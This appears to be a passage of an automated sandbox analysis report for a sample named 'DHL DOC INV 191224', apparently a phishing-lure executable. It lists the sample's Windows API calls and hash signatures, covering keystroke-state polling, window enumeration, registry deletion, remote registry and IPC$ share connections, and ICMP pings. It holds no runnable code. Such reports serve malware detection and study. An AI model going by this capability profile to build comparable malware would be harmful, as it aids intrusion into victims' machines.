• SelectObject.GDI32(?,?), ref: 003B26D8
• DeleteObject.GDI32(?), ref: 003B26E1
• DeleteDC.GDI32(?), ref: 003B26E8
• ReleaseDC.USER32(00000000,?), ref: 003B26F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: e987be8f74879bee4ddd0b28704b26de7ab92189839ff8d37be71768e713c489
• Instruction ID: a6b80b54b716300d19dbed2ed2fd355c3818698280649b8ccc60aca294d095be
• Opcode Fuzzy Hash: e987be8f74879bee4ddd0b28704b26de7ab92189839ff8d37be71768e713c489
• Instruction Fuzzy Hash: F161E275D00219EFCB05CFA8D884EAEBBB9FF48310F248529EA59A7650D770A951CF50
APIs
• ___free_lconv_mon.LIBCMT ref: 0036DAA1
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D659
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D66B
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D67D
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D68F
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6A1
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6B3
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6C5
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6D7
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6E9
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6FB
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D70D
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D71F
  • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D731
• _free.LIBCMT ref: 0036DA96
  • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
  • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
• _free.LIBCMT ref: 0036DAB8
• _free.LIBCMT ref: 0036DACD
• _free.LIBCMT ref: 0036DAD8
• _free.LIBCMT ref: 0036DAFA
• _free.LIBCMT ref: 0036DB0D
• _free.LIBCMT ref: 0036DB1B
• _free.LIBCMT ref: 0036DB26
• _free.LIBCMT ref: 0036DB5E
• _free.LIBCMT ref: 0036DB65
• _free.LIBCMT ref: 0036DB82
• _free.LIBCMT ref: 0036DB9A
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 278177196097487cac48de3a350a71367e66c0310c5230840ccae3f19cb8f322
• Instruction ID: dfc110e27de1b08c7e9c5d28a5194ca201564474e56af22a5237be7576bcf861
• Opcode Fuzzy Hash: 278177196097487cac48de3a350a71367e66c0310c5230840ccae3f19cb8f322
• Instruction Fuzzy Hash: A6315A31B046049FEB27AA79E845B6B77E9FF42350F16C419E449DB199DB30AC508720
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0039369C
• _wcslen.LIBCMT ref: 003936A7
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00393797
• GetClassNameW.USER32(?,?,00000400), ref: 0039380C
• GetDlgCtrlID.USER32(?), ref: 0039385D
• GetWindowRect.USER32(?,?), ref: 00393882
• GetParent.USER32(?), ref: 003938A0
• ScreenToClient.USER32(00000000), ref: 003938A7
• GetClassNameW.USER32(?,?,00000100), ref: 00393921
• GetWindowTextW.USER32(?,?,00000400), ref: 0039395D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
• String ID: %s%u
• API String ID: 4010501982-679674701
• Opcode ID: 5748febb2b875b52b7824c17dc473fbeb6ca6a0dd5ecd003dacd9614d32afd35
• Instruction ID: a648bcd9a0d8653c253dd18489b8d66cd5745203d74aaeb2d8ee2e2aad52fb8f
• Opcode Fuzzy Hash: 5748febb2b875b52b7824c17dc473fbeb6ca6a0dd5ecd003dacd9614d32afd35
• Instruction Fuzzy Hash: 1791B3B1204606AFDB1ADF64C885FEAF7A8FF44350F008529F999D6190DB30EA59CB91
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00394994
• GetWindowTextW.USER32(?,?,00000400), ref: 003949DA
• _wcslen.LIBCMT ref: 003949EB
• CharUpperBuffW.USER32(?,00000000), ref: 003949F7
• _wcsstr.LIBVCRUNTIME ref: 00394A2C
• GetClassNameW.USER32(00000018,?,00000400), ref: 00394A64
• GetWindowTextW.USER32(?,?,00000400), ref: 00394A9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 00394AE6
• GetClassNameW.USER32(?,?,00000400), ref: 00394B20
• GetWindowRect.USER32(?,?), ref: 00394B8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 210c1f81d6bb26001a7abf102b0a2b2a5b867d8f13517cefe66c46e7e29ed6d6
• Instruction ID: f5db9d029bac249ef57305214df8310d543c629ec440f2e50064f5608c127cc6
• Opcode Fuzzy Hash: 210c1f81d6bb26001a7abf102b0a2b2a5b867d8f13517cefe66c46e7e29ed6d6
• Instruction Fuzzy Hash: BA91A1721082059FDF06DF14C985FAA77E8FF84314F05846AFD899A196EB30ED46CBA1
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003C3A9D
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003C3AA0
• GetWindowLongW.USER32(?,000000F0), ref: 003C3AC7
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C3AEA
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003C3B62
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 003C3BAC
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 003C3BC7
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 003C3BE2
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 003C3BF6
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 003C3C13
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID: xV
• API String ID: 312131281-2513823414
• Opcode ID: 26b5531d4a7ea3b957e06b9065284c0a13683d04dcfefc3ce1d7da5a74432f59
• Instruction ID: f2f70812aee2608e0b5ad3995fbe8d521817498e62f6b6a424d07b88d3379393
• Opcode Fuzzy Hash: 26b5531d4a7ea3b957e06b9065284c0a13683d04dcfefc3ce1d7da5a74432f59
• Instruction Fuzzy Hash: 38616B75900248AFDB11DFA8CD81FEE77B8EB09700F1081A9FA15EB2A1D774AE45DB50
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 0039DC20
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0039DC46
• _wcslen.LIBCMT ref: 0039DC50
• _wcsstr.LIBVCRUNTIME ref: 0039DCA0
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0039DCBC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
• Opcode ID: eeb06fe88d3705b24a8b9bf1c475865b1ce4130ed402c5016eafa5068e9d0fe6
• Instruction ID: 67e0d47ec28dfcf9665c95966379efb694eab1354ccf75ba46f845ddaed42042
• Opcode Fuzzy Hash: eeb06fe88d3705b24a8b9bf1c475865b1ce4130ed402c5016eafa5068e9d0fe6
• Instruction Fuzzy Hash: 71413332940204BAEB17AB748C47FFF77ACEF46751F14046AF904EA192EB74AD0187A4
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003BCC64
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 003BCC8D
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003BCD48
  • Part of subcall function 003BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 003BCCAA
  • Part of subcall function 003BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 003BCCBD
  • Part of subcall function 003BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003BCCCF
  • Part of subcall function 003BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003BCD05
  • Part of subcall function 003BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003BCD28
• RegDeleteKeyW.ADVAPI32(?,?), ref: 003BCCF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2734957052-4033151799
• Opcode ID: 79634a6c6e22e14e546e98f3014191d0ce55a44d14f00d2020aead9a063b073f
• Instruction ID: a43ffb52aa72931739b60d47447d44d2582763403a39ff6c64ac50f65ac4f65f
• Opcode Fuzzy Hash: 79634a6c6e22e14e546e98f3014191d0ce55a44d14f00d2020aead9a063b073f
• Instruction Fuzzy Hash: 7C31A075911129BBD7328B51DC88EFFBB7CEF51744F001169EA0AE2100D6309A46DBA0
APIs
• timeGetTime.WINMM ref: 0039E6B4
  • Part of subcall function 0034E551: timeGetTime.WINMM(?,?,0039E6D4), ref: 0034E555
• Sleep.KERNEL32(0000000A), ref: 0039E6E1
• EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0039E705
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0039E727
• SetActiveWindow.USER32 ref: 0039E746
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0039E754
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0039E773
• Sleep.KERNEL32(000000FA), ref: 0039E77E
• IsWindow.USER32 ref: 0039E78A
• EndDialog.USER32(00000000), ref: 0039E79B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: be737da9fb929e383571a955436125f0c82f3ae6c695beee5843a908c82b4f26
• Instruction ID: ebb1aa120ed037245db8b26b3c5e69ffd9e376789b486543b344a98aa56c72f4
• Opcode Fuzzy Hash: be737da9fb929e383571a955436125f0c82f3ae6c695beee5843a908c82b4f26
• Instruction Fuzzy Hash: EE2150B0210205AFFF03AF61EE8DE253B6DF755748F181834F915E15A1DBB2AC408B19
APIs
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0039EA5D
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0039EA73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039EA84
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0039EA96
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0039EAA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: 7af52402bff7cbbd550038b61d434d240f5be0d11ed818a6f214b1214d44723a
• Instruction ID: 18d869fd9af7cc97c36932f1d242e6ef5431f4344e293f3f38239a94e9d51967
• Opcode Fuzzy Hash: 7af52402bff7cbbd550038b61d434d240f5be0d11ed818a6f214b1214d44723a
• Instruction Fuzzy Hash: 84117331A9025D79EB22E7A1DC8AEFF6A7CEBD1B00F404429F501A60E1EFB05D05C6B0
APIs
  • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
  • Part of subcall function 0034912D: GetCursorPos.USER32(?), ref: 00349141
  • Part of subcall function 0034912D: ScreenToClient.USER32(00000000,?), ref: 0034915E
  • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000001), ref: 00349183
  • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000002), ref: 0034919D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 003C8B6B
• ImageList_EndDrag.COMCTL32 ref: 003C8B71
• ReleaseCapture.USER32 ref: 003C8B77
• SetWindowTextW.USER32(?,00000000), ref: 003C8C12
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003C8C25
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 003C8CFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID$p#@$xV
• API String ID: 1924731296-2825210122
• Opcode ID: 4be898ad986f1d6853ef2a71bf83939352d8fd0a4ae074ecee7de7dc3e5f8e66
• Instruction ID: c12e06f26dbef3d3ebae04ea9392cfc7e8f5530fead4e9ee5b96408c1d51cb87
• Opcode Fuzzy Hash: 4be898ad986f1d6853ef2a71bf83939352d8fd0a4ae074ecee7de7dc3e5f8e66
• Instruction Fuzzy Hash: 62515B71104304AFD706EF24D995FAA77E4FB88714F00062DF956AB2E1CB71AE44CB62
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0037F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00399717
• LoadStringW.USER32(00000000,?,0037F7F8,00000001), ref: 00399720
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0037F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00399742
• LoadStringW.USER32(00000000,?,0037F7F8,00000001), ref: 00399745
• MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00399866
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 747408836-2268648507
• Opcode ID: 23a1d1e0bc635c6cbf1cac1bbad6f09daf5273cc93f54ac3943df6319ccd395d
• Instruction ID: d8199f90e3e5e1f3f5981dc8fe3aa7bbf71795182e6faa6172313a7aeed73516
• Opcode Fuzzy Hash: 23a1d1e0bc635c6cbf1cac1bbad6f09daf5273cc93f54ac3943df6319ccd395d
• Instruction Fuzzy Hash: 76414072904109AACF06FBE4CE86EEE737CAF55340F10406AF6057A092EB756F48CB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003907A2
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003907BE
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003907DA
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00390804
                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0039082C
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00390837
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0039083C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
APIs
• VariantInit.OLEAUT32(?), ref: 003B3C5C
• CoInitialize.OLE32(00000000), ref: 003B3C8A
• CoUninitialize.OLE32 ref: 003B3C94
• _wcslen.LIBCMT ref: 003B3D2D
• GetRunningObjectTable.OLE32(00000000,?), ref: 003B3DB1
• SetErrorMode.KERNEL32(00000001,00000029), ref: 003B3ED5
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 003B3F0E
• CoGetObject.OLE32(?,00000000,003CFB98,?), ref: 003B3F2D
• SetErrorMode.KERNEL32(00000000), ref: 003B3F40
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003B3FC4
• VariantClear.OLEAUT32(?), ref: 003B3FD8
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
APIs
• CoInitialize.OLE32(00000000), ref: 003A7AF3
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003A7B8F
• SHGetDesktopFolder.SHELL32(?), ref: 003A7BA3
• CoCreateInstance.OLE32(003CFD08,00000000,00000001,003F6E6C,?), ref: 003A7BEF
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003A7C74
• CoTaskMemFree.OLE32(?,?), ref: 003A7CCC
• SHBrowseForFolderW.SHELL32(?), ref: 003A7D57
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003A7D7A
• CoTaskMemFree.OLE32(00000000), ref: 003A7D81
• CoTaskMemFree.OLE32(00000000), ref: 003A7DD6
• CoUninitialize.OLE32 ref: 003A7DDC
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0038FAAF
• SafeArrayAllocData.OLEAUT32(?), ref: 0038FB08
• VariantInit.OLEAUT32(?), ref: 0038FB1A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0038FB3A
• VariantCopy.OLEAUT32(?,?), ref: 0038FB8D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 0038FBA1
• VariantClear.OLEAUT32(?), ref: 0038FBB6
• SafeArrayDestroyData.OLEAUT32(?), ref: 0038FBC3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038FBCC
• VariantClear.OLEAUT32(?), ref: 0038FBDE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038FBE9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
• GetKeyboardState.USER32(?), ref: 00399CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00399D22
• GetKeyState.USER32(000000A0), ref: 00399D3D
• GetAsyncKeyState.USER32(000000A1), ref: 00399D57
• GetKeyState.USER32(000000A1), ref: 00399D6C
• GetAsyncKeyState.USER32(00000011), ref: 00399D84
• GetKeyState.USER32(00000011), ref: 00399D96
• GetAsyncKeyState.USER32(00000012), ref: 00399DAE
• GetKeyState.USER32(00000012), ref: 00399DC0
• GetAsyncKeyState.USER32(0000005B), ref: 00399DD8
• GetKeyState.USER32(0000005B), ref: 00399DEA
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 003B05BC
• inet_addr.WSOCK32(?), ref: 003B061C
• gethostbyname.WSOCK32(?), ref: 003B0628
• IcmpCreateFile.IPHLPAPI ref: 003B0636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003B06C6
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003B06E5
• IcmpCloseHandle.IPHLPAPI(?), ref: 003B07B9
• WSACleanup.WSOCK32 ref: 003B07BF
Strings
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
Strings
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
APIs
• CoInitialize.OLE32 ref: 003B3774
• CoUninitialize.OLE32 ref: 003B377F
• CoCreateInstance.OLE32(?,00000000,00000017,003CFB78,?), ref: 003B37D9
• IIDFromString.OLE32(?,?), ref: 003B384C
• VariantInit.OLEAUT32(?), ref: 003B38E4
• VariantClear.OLEAUT32(?), ref: 003B3936
Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
